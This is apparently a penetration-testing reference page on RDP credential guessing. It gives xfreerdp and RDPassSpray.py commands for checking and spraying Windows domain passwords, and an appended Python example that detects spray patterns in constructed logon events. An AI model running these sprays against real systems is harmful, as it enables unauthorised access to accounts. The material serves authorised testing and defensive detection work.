RDP
Use the RDP service to guess Windows-related credentials. Especially useful in an Active Directory environment.
Check Credentials
xfreerdp
xfreerdp /v:<TARGET> +auth-only /d:<DOMAIN> /u:<USER> /p:<PASSWORD> /sec:nla /cert-ignore 2>&1 | grep freerdp_set_last_error
Understand results:
Output | Meaning |
---|---|
(no output) | Good credentials, RDP access |
ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] | Good credentials, no RDP access |
ERRCONNECT_LOGON_FAILURE [0x00020014] | Wrong credentials |
RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD>
**Source**: github.com/xFreed0m/RDPassSpray
Note
Logs are written to $INSTALLDIR/RDPassSpray.<date>.log
Password Spray
RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -U </path/to/user/file> -p <PASSWORD>
**Source**: github.com/xFreed0m/RDPassSpray
Note
Logs are written to $INSTALLDIR/RDPassSpray.<date>.log
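On the defending side, a spray like the one above appears as failed logons for many different accounts from one source within a short time. The following is an added example, not part of the original page or of RDPassSpray: it flags that pattern in constructed records modelled on Windows Security events 4625 (failed logon) and 4624 (successful logon). The record layout, the `detect_spray` name, the threshold and the window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, not real logs: (time, event_id, source_ip, account).
# 4625 = Windows Security "An account failed to log on"; 4624 = successful logon.
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01", 4625, "10.0.0.50", "alice"),   # one source, many accounts
    ("2024-05-01T09:00:20", 4625, "10.0.0.50", "bob"),
    ("2024-05-01T09:00:41", 4625, "10.0.0.50", "carol"),
    ("2024-05-01T09:01:02", 4625, "10.0.0.50", "dave"),
    ("2024-05-01T09:01:30", 4625, "10.0.0.50", "erin"),
    ("2024-05-01T09:05:00", 4625, "10.0.0.7", "frank"),    # one user mistyping
    ("2024-05-01T09:05:10", 4625, "10.0.0.7", "Frank"),
    ("2024-05-01T09:05:25", 4625, "10.0.0.7", "frank"),
    ("2024-05-01T09:05:40", 4624, "10.0.0.7", "frank"),
    ("2024-05-01T08:00:00", 4625, "10.0.0.9", "alice"),    # spread over hours
    ("2024-05-01T09:00:00", 4625, "10.0.0.9", "bob"),
    ("2024-05-01T10:00:00", 4625, "10.0.0.9", "carol"),
    ("2024-05-01T11:00:00", 4625, "10.0.0.9", "dave"),
]

def detect_spray(events, min_users=4, window=timedelta(minutes=10)):
    """Return {source_ip: [accounts]} for sources whose failed logons hit at
    least min_users distinct accounts inside one sliding time window."""
    by_source = defaultdict(list)
    for ts, event_id, src, user in events:
        if event_id == 4625:  # only failed logons count
            by_source[src].append((datetime.fromisoformat(ts), user.lower()))
    flagged = defaultdict(set)
    for src, fails in by_source.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Shrink the window from the left until it spans at most `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                flagged[src] |= users
    return {src: sorted(users) for src, users in flagged.items()}

if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {src}: {len(users)} accounts: {', '.join(users)}")
```

The 10.0.0.9 rows show the limit of a fixed window: attempts spaced wider than the window are not flagged, so slow sprays need a longer window or a per-day count of distinct accounts per source.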
References
- https://github.com/dafthack/RDPSpray
- https://www.blackhillsinfosec.com/podcast-rdp-logging-bypass-and-azure-active-directory-recon/